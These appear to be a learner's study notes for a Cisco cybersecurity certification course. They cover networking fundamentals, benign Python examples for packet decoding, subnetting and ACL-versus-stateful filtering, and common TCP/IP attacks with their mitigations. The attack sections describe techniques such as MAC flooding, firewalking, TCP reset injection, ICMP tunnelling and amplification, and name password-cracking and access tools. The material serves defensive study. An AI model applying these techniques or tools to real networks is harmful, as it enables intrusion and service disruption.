1. Objectives:
    1. Pass the exams and get the certificate (passed on 14 Oct 2017)
    2. Learn something and get a starting point
    3. Knowledge transfer to your colleagues
  2. Course Structures
    1. Introduction to Cybersecurity (with quizzes)
    2. 210-250 SECFND (Understanding Cisco Cybersecurity Fundamentals)
    3. 210-255 SECOPS (Implementing Cisco Cybersecurity Operations)
  3. Contents (36 hours of lecturing at Systematic, assuming another 72 hours of self-study)
    1. Introduction to Cybersecurity
      1. Ch1 – The need for cybersecurity
        1. protection of networked systems and data from unauthorized use or harm;
      2. Ch2 – Attacks, concepts and techniques
        1. Malicious software or malware, blended attack
          1. Types of malware
            1. Spyware
            2. Adware
            3. Bot: automatically performs actions under the control of a remote operator (many bots = botnet)
            4. Ransomware: encrypts files and holds them until payment
            5. Scareware: persuades the user to take an action (typically install more malware) through fear
            6. Rootkit: modifies the OS to hide itself and create a backdoor; better to reinstall the OS than to attempt a clean-up
            7. Virus (attaches to executable files and needs a host program to spread) / Trojan horse (malicious code hidden in something that looks legitimate; the course's example is non-executable content such as images or videos) / Worm (self-replicates across the network without user action)
            8. Man-in-the-Middle: attacker intercepts and relays traffic between two parties
            9. Man-in-the-Mobile: malware that takes control of the mobile device, e.g. to capture SMS-delivered verification codes
        2. Security vulnerabilities: defect
          1. Software security vulnerabilities:
            1. Buffer overflow: writing data beyond the boundaries of a buffer overwrites adjacent memory; prevent it in code by bounds-checking every write, using length-limited APIs (snprintf/strncpy/fgets instead of sprintf/strcpy/gets), preferring memory-safe languages, and building with compiler protections (stack canaries, NX/DEP, ASLR) as a second line of defence;
            2. Non-validated input: data from users or the network is used without checking its length, type and range (source of injection and overflow bugs);
            3. Race conditions: the outcome depends on the timing of events, e.g. time-of-check to time-of-use (TOCTOU) on a file;
            4. Weaknesses in security practices: developers should use vetted security libraries rather than writing their own crypto or authentication;
            5. Access control problems: resources are not protected properly; first prevent physical access, then enforce least privilege;
          2. Hardware security vulnerabilities:
            1. RowHammer: repeatedly accessing (hammering) the same row of DRAM induces bit flips in physically adjacent rows, which can be used to corrupt data or escalate privileges without any software bug;
        3. Exploit: a program or technique that takes advantage of a vulnerability
        4. Social Engineering:
          1. pretexting
          2. tailgating
          3. Something for Something (Quid pro quo)
        5. Wifi password cracking
          1. social engineering / brute force attacks / network sniffing
        6. Phishing and spear phishing
        7. DoS (quantity and error packets) & DDoS
        8. SEO poisoning: using search engine optimization techniques to push malicious or fake websites higher in search rankings so that victims are directed to them;
      3. Ch3 – Protecting your data and privacy
        1. Keep Firewall on;
        2. Use Antivirus and Anti-Spyware;
        3. Manage OS and browsers;
        4. Protect all your devices; especially IoT (better with isolated network);
        5. Don't reuse one password across online accounts (one breach then exposes all of them);
        6. Use passphrases instead of passwords;
        7. Use a password manager so that you only have to remember its master password;
        8. Encryption: converting into a form that unauthorized one cannot read;
        9. Backup data on external disks or cloud-based storage; check whether cloud data is really erased after you delete it;
        10. Two-factor authentication: adds a second factor (something you have) on top of the password; still can be compromised by techniques such as social engineering (phishing the one-time code);
        11. OAuth 2.0:
          1. access a web app with your social media account (eg. Facebook) without giving the app your password;
          2. the web app must first be registered with Facebook (it gets a client ID and secret);
          3. when you log in, the web app redirects you to Facebook; you authenticate with Facebook and consent; Facebook sends an authorization code back to the app, which exchanges it for an access token; the app never sees your Facebook credentials;
      4. Ch4 – Protecting the organization
        1. firewall: control and filter communication in and out;
          1. type: host based, network based, proxy, reverse proxy, network layer, transport layer, application layer, NAT, context aware;
        2. port scanning responses: open / accepted; closed / denied (RST or ICMP unreachable returned); filtered / dropped (no reply, typically a firewall);
        3. Security appliances: routers, firewalls, VPN, AMP, IPS
        4. Security best practices:
          1. perform risk assessment
          2. create security policy
          3. physical security measures
          4. HR security measures
          5. Perform and test backups
          6. Maintain security updates
          7. Employ access controls
          8. Regularly test incident response
          9. Implement a network monitoring, analytics and management tool;
          10. Implement network security devices;
          11. Use a comprehensive Enterprise Endpoint security solution: enterprise level anti-malware and antivirus software;
          12. Educate users
          13. Encrypt data
        5. Cyber kill chain
        6. Behavior-based security: context and patterns of behavior which could be used to detect anomalies; (eg. Netflow)
          1. honeypots & Cisco Cyber Threat Defense Solution Architecture
        7. Cisco Netflow technology – gather information of data flow in network; included in switch / router…;
        8. CSIRT – Computer Security Incident Response Team
        9. A Security Playbook – collection of repeatable queries (reports) run against security data to detect and respond to incidents
        10. Tools for Incident detection and prevention
          1. SIEM – Security Information and Event Management: collects and analyzes security alerts/logs;
          2. DLP – Data Loss Prevention software;
          3. Cisco ISE and TrustSec
        11. IDS – works on a copy (mirror/SPAN) of the traffic, so it adds no delay but can only alert, not block;
        12. IPS – sits inline and can drop malicious traffic; open-source example: Snort
      5. Ch5 – Will your future be in Cybersecurity?
    2. SECFND
      1. Section1 – Understanding the TCP/IP Protocol Suite
        1. 1.1 Introduction
        2. 1.2 OSI Model
        3. 1.3 TCP/IP Model
        4. 1.4 Intro to the Internet Protocol:
          1. connectionless, best-effort protocol (no guarantee of delivery and no recovery; left to upper layers such as TCP);
          2. IPv4 header: 20 bytes (160 bits) minimum, up to 60 bytes with options;
          3. Max. size of an IP packet: 65,535 bytes (~64 KB), header included;
          4. 1-byte (8-bit) Time to Live field in the header, decremented by each router; the packet is discarded when it reaches zero, which prevents routing loops;
          5. IP address – logical address (layer 3); MAC address – physical address (layer 2);
        5. 1.5 IP Addressing: network address / host address / subnet mask
        6. 1.6 IP address classes
          1. Class A: first octet 1-126; default mask /8; 16,777,214 hosts / network
          2. Class B: first octet 128-191; default mask /16; 65,534 hosts / network
          3. Class C: first octet 192-223; default mask /24; 254 hosts / network
        7. Reserved IP addresses
          1. Network address: all host bits 0 (first address of the subnet)
          2. Directed broadcast address: all host bits 1 (last address of the subnet)
          3. Local broadcast address (never routed outside the local segment): 255.255.255.255
          4. Local loopback addresses: 127.0.0.0/8 (127.x.x.x)
          5. Autoconfiguration (link-local / APIPA) addresses: 169.254.0.0/16, self-assigned by a host when no DHCP server answers; otherwise addresses come from DHCP or static configuration
        8. Public and private IP: private ranges exist in all 3 classes (RFC 1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and are translated to public addresses by NAT;
        9. IPv6 addresses:
          1. fixed 40-byte header (simpler than IPv4; options moved into extension headers)
          2. 128-bit address;
          3. IPv6 address format: eight 16-bit hexadecimal fields separated by colons;
          4. leading zeros within a field may be omitted; one run of consecutive all-zero fields may be replaced by :: (only once per address);
          5. Unicast: one-to-one communication
          6. Multicast: one-to-many communication, prefix FF00::/8 (eg. FF02::1 all nodes on the link, FF01::1 interface-local all nodes)
          7. Loopback: ::1
          8. Unspecified address: :: ; the default route is written ::/0
        10. Intro to the TCP:
          1. Layer 4, IP protocol number 6; connection-oriented (reliable, ordered delivery); full duplex;
          2. TCP headers
            1. Window field: number of octets the receiver is willing to accept before an acknowledgement (flow control);
        11. TCP three-way handshake (SYN & ACK bits in headers)
          1. SYN; SYN/ACK; ACK
          2. ISN: each side generates its own initial sequence number; it must be unpredictable, otherwise an attacker can inject spoofed segments into the connection;
        12. Intro to the UDP
          1. IP protocol number 17; connectionless, no reliability or ordering;
          2. TFTP (69) / SNMP (161, 162) / DNS (53) / NTP (123)
        13. TCP and UDP ports
          1. well-known ports (0-1023); registered ports (1024-49151); dynamic / ephemeral ports (49152-65535 per IANA; Linux by default uses 32768-60999 for ephemeral ports);
        14. Address Resolution Protocol
          1. ARP: maps IP addresses to MAC addresses;
          2. 48-bit physical MAC address;
          3. sits between layer 2 and layer 3 (carried directly in Ethernet frames, resolves layer-3 addresses);
          4. Command: arp -a
          5. ARP messages are sent using Ethertype 0x0806; ARP has no authentication, so any host can answer for any IP (ARP poisoning);
        15. Host-to-host packet delivery using TCP
          1. ARP table
          2. ARP request is broadcast to FF:FF:FF:FF:FF:FF (Cisco notation FFFF.FFFF.FFFF); the reply is unicast to the requester
        16. Dynamic Host Configuration Protocol (UDP ports 67 & 68)
          1. DHCP attacks: Insertion of rogue DHCP servers (man-in-the-middle attack) & DHCP starvation;
          2. DHCP 4 steps (4 messages exchanged)
            1. DHCPDISCOVER
            2. DHCPOFFER
            3. DHCPREQUEST
            4. DHCPACK
        17. Domain Name System
          1. UDP 53 for normal queries; TCP 53 for zone transfers and responses too large for UDP
          2. Attacks: spoofing / cache poisoning to redirect clients to malicious systems, DNS tunneling, and reflection/amplification DDoS;
        18. Internet Control Message Protocol
          1. ping utility sends ICMP echo request and receives ICMP echo reply packets;
          2. 4 common codes of the ICMP Destination Unreachable message (type 3)
            1. Network-unreachable (code 0)
            2. Host-unreachable (code 1)
            3. Protocol-unreachable (code 2)
            4. Port-unreachable (code 3)
          3. “ICMP time-exceeded” message is sent by the router if an IP packet’s TTL field reaches zero
        19. Packet Capture Using tcpdump
          1. SPAN (port mirroring) on the switch copies traffic to the port where the capture host sits
          2. In Linux: tcpdump --help (or tcpdump -h) lists the options
          3. the network card must be in "promiscuous mode" to capture frames not addressed to it;
        20. Wireshark
          1. display filters use Wireshark's own syntax (eg. ip.addr == 10.0.0.5); capture filters, like tcpdump, use BPF syntax (eg. host 10.0.0.5);
        21. Lab
          1. Examine ARP and ICMP packets;
            1. Kali Linux: ifconfig; cat /etc/resolv.conf; netstat -r;
            2. Command to check MAC table: arp -a
            3. Two packets for ARP exchange (for source); Two packets for ARP exchange (for destination); 8 ICMP packets (4 echo request-echo reply pairs);
          2. Examine Ethernet headers
            1. Type field in the Ethernet header: pointer from this layer to the next layer's protocol. In today's networks three ethertypes are the most common: 0x0800 for IPv4, 0x86DD for IPv6, and 0x0806 for ARP;
            2. Checksum/FCS computation is often offloaded to the NIC hardware: when capturing on the sending host, Wireshark sees the frame before the NIC fills the field in, so it flags a bad checksum that never existed on the wire. If you see this on outbound frames only, disable checksum validation in the protocol preferences rather than chase a phantom error;
          3. Examine IP header
          4. Examine ICMP header and data
            1. DNS queries for AAAA records which map hostnames to IPv6 addresses;
          5. Examine TCP connection
            1. Right click packet and select “Follow” in WireShark;
            2. Statistics > Conversations > TCP tab
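An added example, not from the course or the lab guide, that decodes a constructed Ethernet II / IPv4 / TCP SYN frame with Python's standard struct module. It shows the header sizes and field positions the notes above list (14-byte Ethernet header with the ethertype, 20-byte IPv4 header with a 1-byte TTL and the protocol number, 20-byte TCP header with the flag bits and window) and classifies the ports into the IANA ranges. The sample bytes are constructed here, not captured, and the checksums are left at zero.

```python
import struct

# Constructed sample frame (not a real capture): Ethernet II + IPv4 + TCP SYN.
# Ethernet: dst 00:11:22:33:44:55, src 66:77:88:99:aa:bb, ethertype 0x0800 (IPv4)
ETH_HDR = bytes.fromhex("001122334455" "66778899aabb" "0800")
# IPv4: version 4 / IHL 5 (20-byte header), ToS 0, total length 40, ID 0x1234,
# flags DF, TTL 64, protocol 6 (TCP), checksum left 0 in this sample, 192.168.1.10 -> 10.0.0.5
IP_HDR = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0,
                     bytes([192, 168, 1, 10]), bytes([10, 0, 0, 5]))
# TCP: sport 49152 (ephemeral) -> dport 443, seq 0x11223344, ack 0,
# data offset 5 (20-byte header), flags SYN, window 65535, checksum 0, urgent 0
TCP_HDR = struct.pack("!HHIIBBHHH", 49152, 443, 0x11223344, 0, 5 << 4, 0x02, 65535, 0, 0)
SAMPLE_FRAME = ETH_HDR + IP_HDR + TCP_HDR

ETHERTYPES = {0x0800: "IPv4", 0x86DD: "IPv6", 0x0806: "ARP"}
IP_PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}
TCP_FLAG_BITS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
                 (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def port_class(port):
    """IANA port ranges as listed in the notes."""
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "ephemeral"


def parse_frame(frame):
    """Decode Ethernet -> IPv4 -> TCP headers, returning the fields an analyst looks at first."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    out = {"dst_mac": mac_str(dst), "src_mac": mac_str(src),
           "ethertype": ETHERTYPES.get(ethertype, hex(ethertype))}
    if ethertype != 0x0800:
        return out  # only IPv4 is decoded further in this example
    ip = frame[14:]
    (ver_ihl, _tos, total_len, _ident, _flags_frag, ttl, proto,
     _csum, src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4          # header length in bytes (20..60)
    out.update({"ip_version": ver_ihl >> 4, "ip_header_len": ihl, "total_len": total_len,
                "ttl": ttl, "protocol": IP_PROTOCOLS.get(proto, proto),
                "src_ip": ".".join(map(str, src_ip)), "dst_ip": ".".join(map(str, dst_ip))})
    if proto == 6:
        tcp = ip[ihl:]
        (sport, dport, seq, ack, offset, flags,
         window, _csum, _urg) = struct.unpack("!HHIIBBHHH", tcp[:20])
        out.update({"src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
                    "tcp_header_len": (offset >> 4) * 4, "window": window,
                    "flags": [name for bit, name in TCP_FLAG_BITS if flags & bit],
                    "src_port_class": port_class(sport), "dst_port_class": port_class(dport)})
    return out


if __name__ == "__main__":
    for key, value in parse_frame(SAMPLE_FRAME).items():
        print(f"{key:16} {value}")
```

The same struct format strings work on bytes read from a pcap payload, which is the quickest way to confirm by hand what Wireshark shows in its header tree.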
      2. Section2
        1. Network infrastructures: interconnected group of hardware and software resource;
        2. Analyzing DHCP operations DORA (UDP 67 at the server; UDP 68 at the client)
          1. DHCPDISCOVER (broadcast from the client)
          2. DHCPOFFER (unicast to the offered address, or broadcast if the client set the broadcast flag)
          3. DHCPREQUEST (broadcast, so all offering servers learn which offer was accepted)
          4. DHCPACK (unicast or broadcast, as for the offer)
        3. IP Subnetting (subnets connected by routers)
          1.  easier management and better security;
          2. subnet mask
          3. VLSM (variable Length Subnet Masks): hierarchical networking, divide networks into subnetworks…
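An added example, not part of the course notes, covering the addressing items above (classes, RFC 1918 ranges, loopback, link-local, network and broadcast addresses, usable hosts, VLSM). It uses only Python's standard ipaddress module; the addresses and host counts in the calls are made up for illustration. The VLSM planner goes slightly beyond the notes: it allocates the smallest power-of-two block for each requested host count, largest first so every block stays aligned.

```python
import ipaddress

RFC1918 = [ipaddress.IPv4Network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def classify_ipv4(addr):
    """Classful class plus the reserved-range checks listed in the notes."""
    a = ipaddress.IPv4Address(addr)
    first = int(a) >> 24
    if first == 127:
        cls = "loopback"
    elif 1 <= first <= 126:
        cls = "A"
    elif 128 <= first <= 191:
        cls = "B"
    elif 192 <= first <= 223:
        cls = "C"
    elif 224 <= first <= 239:
        cls = "D (multicast)"
    else:
        cls = "E / reserved"
    return {"class": cls,
            "rfc1918_private": any(a in n for n in RFC1918),
            "loopback": a.is_loopback,
            "link_local": a.is_link_local,        # 169.254.0.0/16 (APIPA)
            "multicast": a.is_multicast,
            "routable_on_internet": a.is_global}


def subnet_info(cidr):
    """Network, directed broadcast, mask and usable host range for any host/prefix."""
    net = ipaddress.IPv4Network(cidr, strict=False)   # strict=False accepts a host address
    usable = net.num_addresses - 2 if net.prefixlen <= 30 else net.num_addresses
    return {"network": str(net.network_address), "broadcast": str(net.broadcast_address),
            "mask": str(net.netmask), "prefix": net.prefixlen, "usable_hosts": usable,
            "first_host": str(net.network_address + 1), "last_host": str(net.broadcast_address - 1)}


def vlsm_split(cidr, host_counts):
    """Carve a block into subnets sized for each host count (VLSM), largest first."""
    base = ipaddress.IPv4Network(cidr)
    cursor, end = int(base.network_address), int(base.broadcast_address) + 1
    plan = []
    for need in sorted(host_counts, reverse=True):
        size = 1 << (need + 2 - 1).bit_length()   # smallest power of two >= need + network + broadcast
        if cursor + size > end:
            raise ValueError(f"{cidr} cannot fit a subnet for {need} more hosts")
        prefix = 32 - (size.bit_length() - 1)
        plan.append((need, str(ipaddress.IPv4Network((cursor, prefix)))))
        cursor += size
    return plan


if __name__ == "__main__":
    for a in ("10.3.4.5", "172.20.1.1", "8.8.8.8", "127.0.0.1", "169.254.9.9", "224.0.0.5"):
        print(a, classify_ipv4(a))
    print(subnet_info("192.168.10.77/26"))
    print(vlsm_split("10.0.0.0/24", [100, 50, 2]))
```

The VLSM plan for 10.0.0.0/24 with 100, 50 and 2 hosts comes out as a /25, a /26 and a /30, leaving 10.0.0.196-10.0.0.255 free for later growth.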
        4. Hubs, bridges, and layer 2 switches
          1. Hub: multiport repeater; single broadcast domain; single collision domain; OSI physical layer; half-duplex
          2. bridge: OSI datalink layer; limited ports
          3. Layer 2 switch: OSI datalink layer; multi-port bridges
            1. Linux attack tool macof (part of the dsniff suite)
            2. floods the switch's MAC address (CAM) table with bogus source addresses; once the table is full the switch floods unknown-destination frames out every port like a hub, and the attacker captures the flooded frames to obtain sensitive info; mitigation: port security (limit the MACs learned per port);
        5. VLANs and Trunks
          1. VLAN: logical broadcast domain (layer 2) that can span multiple physical LAN segments; segmented logically by functions, project teams, and applications;  interconnect two different VLANs, you must use routers or Layer 3 switches;
          2. Trunks:  a conduit for VLANs between switches and routers to connect multiple VLANs together; does not belong to a specific VLAN;
            1. IEEE 802.1Q: 4-byte tagging field into the original Ethernet frame
            2. By default, one native VLAN, which is untagged (by default, VLAN 1)
        6. Spanning Tree Protocols (STP) in switch (IEEE 802.1D)
          1. Layer 2; locates and stops Loops;
          2. root bridge elected by STP;
        7. Standalone (Autonomous) and Lightweight Access Points
          1. 2 solutions: standalone or controller-based
            1. Standalone:
              1. configure autonomous APs one by one; BSS (Basic Service Set); BSSID (Basic Service Set Identifier, unique, derived from the AP's MAC address); SSID (human-readable text string);
              2. for small deployments;
            2. Controller-based
              1. configure LWAPs (Light Weight Access Point – config. is done by central WLC) by WLAN controllers;
              2. CAPWAP (Control and Provisioning of Wireless Access Point): WLC and LWAP could be on different IP subnets, encapsulating the data between the LWAP and WLC;
              3. Light weight AP interacts clients at MAC layer;
          2. RF frequency
          3. WLAN controller & Light weight AP
        8. Routers (routing table)
          1. Functions
            1. path determination with administrative distance by routing protocols;
            2. packet forwarding between subnets;
          2. Types of routes
            1. default route (gateway);
            2. directly connected networks;
            3. static routes: for small network configurations;
            4. Dynamic routes
              1. IGP (eg. RIP…)
              2. EGP (eg. BGP…)
        9. Routing Protocols:
          1. Objective: exchange network reachability information between routers and dynamically adapt to network changes;
          2. Best Practices:
            1. use one IP routing protocol throughout the enterprise;
            2. for using 2 IP routing protocol, normal with BGP and OSPF/EIGRP;
          3. Grouping
            1. Within or between ASs: IGP (Interior Gateway Protocols) / EGP;
            2. How they operate:
              1. Distance Vector Protocols (EIGRP & RIPv2): distance and direction
              2. Link-state Protocols (OSPF & IS-IS): determine best path by SPF;
              3. Path Vector Protocols (BGP): path and direction
        10. Multilayer Switches (Layer 3 switches)
          1.  use ASIC (application-specific integrated circuit) hardware to perform header rewrites and forwarding; SVI;
          2. CAM (content-addressable memory) table (L2 forwarding table)
          3. FIB (forwarding information base) table, L3 forwarding table;
          4. TCAM table contains ACLs; QoS decision;
        11. NAT Fundamentals
          1. NAT: Inside local (RFC 1918), inside global, outside local, outside global;
          2. PAT
          3. types:
            1. static NAT: fixed one-to-one mapping (eg. DMZ servers)
            2. dynamic NAT: one-to-one from a pool, assigned on demand
            3. dynamic PAT (NAT overload, Hide NAT, many-to-one NAT): many inside hosts share one public address, distinguished by translated source ports
            4. static PAT (port forwarding): a fixed public address:port mapped to an inside address:port
            5. Policy NAT: translation decided by ACL match on source and destination
        12. Packet Filtering with ACLs
          1. ip access-group command
          2. explicitly denied (matched by a deny entry); implicitly denied (matched by no entry: every ACL ends with an implicit deny any);
        13. ACLs with the Established Option (stateful behavior)
          1. established keyword: matches TCP segments whose ACK or RST bit is set, i.e. segments that look like part of an already-established connection rather than a new SYN;
          2. established does not imply stateful inspection: it checks header bits only, so an ACK scan (TCP ACK or RST probes, nmap -sA) is permitted, whereas a stateful packet filter with no matching connection entry drops the same packets;
          3. FTP active / passive mode
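An added illustration, not from the course, of the difference the notes draw between an ACL with the established keyword and a stateful filter. A handful of constructed inbound TCP segments (not a capture) are run through both: a function that mimics "permit tcp any 10.1.1.0 0.0.0.255 established" plus the implicit deny, and a minimal state table that only admits replies to connections an inside host opened. The inside network 10.1.1.0/24 and all addresses are made up.

```python
from collections import namedtuple
import ipaddress

Pkt = namedtuple("Pkt", "src dst sport dport flags")  # flags: set of TCP flag names

INSIDE = ipaddress.IPv4Network("10.1.1.0/24")

# Constructed traffic (not a capture). One legitimate outbound request from an inside
# client, then four inbound segments arriving at the outside interface.
OUTBOUND = Pkt("10.1.1.5", "203.0.113.7", 52000, 80, {"SYN"})
INBOUND = [
    Pkt("203.0.113.7", "10.1.1.5", 80, 52000, {"SYN", "ACK"}),  # reply to the request above
    Pkt("203.0.113.9", "10.1.1.5", 40000, 22, {"SYN"}),        # unsolicited SSH connection attempt
    Pkt("203.0.113.9", "10.1.1.5", 40001, 22, {"ACK"}),        # bare ACK, as sent by nmap -sA
    Pkt("203.0.113.9", "10.1.1.5", 40002, 22, {"RST"}),        # bare RST probe
]


def acl_established(pkt):
    """Cisco-style 'permit tcp any 10.1.1.0 0.0.0.255 established' followed by the
    implicit deny: decides on header bits only (ACK or RST set), no memory of earlier packets."""
    inside_dst = ipaddress.IPv4Address(pkt.dst) in INSIDE
    return inside_dst and bool(pkt.flags & {"ACK", "RST"})


class StatefulFilter:
    """Minimal stateful packet filter: inbound TCP is allowed only if it matches a
    connection an inside host opened (the reverse 4-tuple is in the state table)."""

    def __init__(self):
        self.state = set()

    def outbound(self, pkt):
        if ipaddress.IPv4Address(pkt.src) in INSIDE and "SYN" in pkt.flags:
            self.state.add((pkt.dst, pkt.dport, pkt.src, pkt.sport))

    def inbound(self, pkt):
        return (pkt.src, pkt.sport, pkt.dst, pkt.dport) in self.state


def compare(outbound, inbound):
    """Return the permit/deny verdict of each filter for every inbound segment."""
    fw = StatefulFilter()
    fw.outbound(outbound)
    return {"acl_established": [acl_established(p) for p in inbound],
            "stateful": [fw.inbound(p) for p in inbound]}


if __name__ == "__main__":
    for name, verdicts in compare(OUTBOUND, INBOUND).items():
        print(f"{name:16}", ["permit" if v else "deny" for v in verdicts])
```

Both filters block the unsolicited SYN, but only the stateful one blocks the bare ACK and RST probes, which is exactly what lets an ACK scan map an established-style ACL.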
        14. Explore the Network infrastructure (Cisco IOS CLI: switches, routers, firwalls, NAT, DHCP)
          1. sh int status / show interface status
          2. sh mac address-table dynamic
          3. tcpdump on Linux, excluding STP and Cisco loopback keepalive frames: tcpdump -n not stp and not ether proto 0x9000
          4. (config-if)switchport access vlan 3
          5. (config-if)switchport trunk
          6. Windows: ncpa.cpl opens Network Connections
          7. sh ip ospf neighbor
          8. sh ip route
          9. sh ip arp
          10. nmap on Linux for port scanning (the default SYN scan, -sS, doesn't complete the three-way handshake: after the SYN/ACK comes back it sends a RST instead of the final ACK, so the connection is never fully opened)
          11. DHCP packets in Wireshark: display filter bootp (older versions) or dhcp (newer versions)
          12. firewall session logs record the standard 5-tuple: protocol, source IP:port, destination IP:port
        15. Challenge
          1. Concepts: Switches place each switch port into its own collision domain; while VLANs separate a large broadcast domain into smaller broadcast domains;
          2. link-state protocols = Each router determines the best path on its own;
          3. distance-vector protocols = does not have an actual map of the network topology;
          4. implicit ACL entry at the end of every ACL: "deny ip any any"
      3. Section 3 – Understanding Common TCP/IP attacks
        1. Legacy TCP/IP vulnerabilities
          1. Morris Worm, 1988: claimed purpose was to gauge the size of the ARPANET; it spread through flaws in sendmail, finger and rsh/rexec;
          2. Main protocols in IP suites (IP, TCP, UDP, ICMP);
        2. IP vulnerabilities
          1. Man-in-the-middle attack (MITM): key point is that the attacker waits until the connection is established, then inserts itself in the path
          2. Session hijacking (eg. sniffing session cookies), usually initiated from a MITM position
          3. IP address spoofing (eg. gratuitous ARP claiming "I am someone else's IP")
            1. blind and nonblind: blind spoofing requires predicting/guessing the ISN sequence numbers because the attacker never sees the replies
          4. DoS (faked IP with TCP SYN) and DDoS (initiated by blind IP spoofing from multiple sources): prevent legitimate users from accessing information or services
            1. such as packet floods, service buffer overflows, teardrop (overlapping fragments);
          5. Smurf attack: ping
          6. Resource exhaustion attacks:
        3. ICMP vulnerabilities (connectionless protocol that does not use any port number and works in the network layer)
          1. reachability (ping / traceroute, which relies on ICMP time-exceeded in transit)
          2. ICMP  query and error
          3. Attacks
            1. ICMP sweep attacks / network reconnaissance refers to the act of scanning the target network to gather information about the target (begins with Reconnaissance such as nmap)
            2. Traceroute (attacker sends packets with increasing TTL to learn topology)
              1. ICMP unreachables
              2. ICMP mask reply
              3. ICMP redirects (example of MITM)
              4. ICMP router discovery
              5. Firewalk attack
                1. techniques to analyze IP packet responses to determine the gateway ACL filters and map out the networks;
                2. sending out TCP or UDP packets with a TTL that is one greater than the targeted gateway;
            3. ICMP tunneling (ICMPTX)
              1. covert channel: carries an arbitrary connection between two computers inside ICMP echo payloads;
              2. LOKI transfers messages secretly inside ICMP; it passes simple filters that only allow "ping", but deep inspection of ICMP payloads (size, entropy, request/reply ratio) can reveal it;
            4. Inverse mapping attacks
            5. ICMP-based OS fingerprinting attacks
              1. default initial TTL 128 suggests Windows; 64 suggests Linux (both can be changed, so this is a hint, not proof);
            6. DDoS
              1. flood target network services with spoofed ICMP echo request;
              2. Smurf attack: trigger ICMP echo replies in volume by spoofed ICMP requests to bring down target’s resources;
            7. ICMP informational message attacks
            8. ICMP router discovery message attacks
        4. TCP vulnerabilities (TCP: flow control, reliability, stateful connection)
          1. TCP SYN Flood
          2. TCP Session Hijacking
            1. Tools: Juggernaut, Hunt, TTY Watcher, T-Sight;
          3. TCP Reset Attack
            1. normal graceful close: FIN > ACK > FIN > ACK; a reset attack instead injects a spoofed RST whose sequence number falls within the receiver's window, so the endpoint tears the connection down immediately
            2. an effective way to disrupt any TCP connection that an attacker can monitor (monitoring gives the addresses, ports and sequence numbers needed);
            3. only established connections are affected;
        5. UDP vulnerabilities
          1. less overhead because it is connectionless and provides no reliability; also no handshake, so source addresses are trivially spoofable
          2. 8-byte UDP header (ports, length, checksum); examples of abuse: SNMP (UDP 161), SQL Slammer worm (single 376-byte packet to UDP 1434);
        6. Attack surface and attack vectors
          1. Attack surface: sum of all the vulnerabilities in a given computing device or network that are accessible to the attackers
            1. network: open ports, insecure protocols, users for admin, low bandwidth;
            2. software: improper coding, privacy, patch mgt;
            3. physical: internal employees, rogue devices, social engineering, passwords on sticky notes, phishing
          2. attacks are unstoppable;
          3. focus on high risk / high impact areas; analysis of attack surface; advanced techniques and technologies;
          4. Attack vectors: paths or means by which the attackers gain access to a resource (such as end-user hosts or servers) in order to deliver malicious software or malicious outcome
            1. eg. SQL injection; DDoS, Phishing, Eaves dropping, Malware injection
          5. Prevention
            1. honeypots, load balancers, advanced firewall protection, updated Antivirus, security policy enforcement, education, SIEM tools;
        7. Reconnaissance attacks
          1. learn more about the intended victim before attempting a more intrusive attack;
          2. techniques: wardriving; port scanning; password guessing;
          3. tools: nmap, Paratrace, OpenVAS, Nessus;
          4. Port scanning
          5. End user: properly trained;
          6. App: vetted by IT,
          7. Types:
            1. passive: Wireshark, keyloggers;
            2. active: Nmap, Nessus, OpenVAS;
          8. Mitigating by:
            1. tight security controls;
            2. SSH
            3. Obscure device names;
            4. strong encryption;
            5. VLANS and Private VLANs (promiscuous port)
            6. IDS / IPS;
            7. NAT / PAT;
          9. Shodan Search Engine
        8. Access attacks
          1. technique of accessing network / user devices and take control of them;
          2. Tools:
            1. Ncrack
            2. Aircrack-ng
            3. CeWL
            4. Crunch
            5. Medusa
            6. RainbowCrack
            7. John the Ripper: unshadow password file
          3. prevention:
            1. filter by ACLs
            2. Multifactor authentication when possible
              1. SMS codes (the weakest option: interceptable and exposed to SIM swapping; prefer authenticator apps or hardware tokens)
            3. WPA2 for wifi
            4. IDS/IPS
            5. Enforce AAA identity management (CISCO ISE)
        9. Man-in-the-middle attacks (eavesdropping attacks or connection hijacking attacks)
          1. clear text communication: telnet, HTTP;
          2. Tools: Ettercap, dsniff;
          3. ARP-based by ARP poisoning: poisons the ARP cache of two devices with the MAC address of the attacker’s NIC
          4. ICMP-based by ICMP redirection
          5. DNS-based by DNS spoofing
          6. DHCP-based
          7. Prevention:
            1. VPN: encrypted traffic
            2. Digital certificates
            3. Strong passwords
            4. Dynamic ARP inspection
            5. IP spoofing detection
            6. DHCP snooping
        10. DoS and DDoS
          1. Ping of Death (historical): fragmented ping reassembling to more than the maximum IP packet size of 65,535 bytes crashed old IP stacks;
          2. ICMP / UDP floods: flood out a network's bandwidth
          3. Botnet: CnC traffic is sent using IRC, P2P, DNS, HTTP or HTTPS
          4. DDoS Trends
            1. Use of cloud-based computing devices
            2. DarkSeoul
            3. Ransomware
            4. Cryptolocker
          5. Prevention
        11. Reflection and Amplification (type of DoS attack)
          1. the attacker spoofs the victim's address as source, so third parties become reflectors / responders and flood the target; amplification when the reply is much larger than the request
          2. Smurf attack: ICMP echo requests to a directed broadcast address with the victim's source IP
          3. mitigation
            1. no ip directed-broadcast (default on Cisco IOS since 12.0)
          4. Smurf is no longer a practical attack method because directed broadcasts are disabled by default
          5. March 2013, DNS amplification: killed websites, exploiting DNS open recursive resolvers; 300Gbps of traffic;
          6. Feb 2014, NTP Amplification attack: 400Gbps of traffic; monlist in NTP;
        12. Spoofing attacks (spoofing is not attack, but incorporated into various types of attacks)
          1. ARP spoofing
          2. Mitigation
            1. snort
            2. ARPwatch
            3. Dynamic ARP Inspection
          3. IP spoofing
            1. mitigation
              1. ACL over private IP
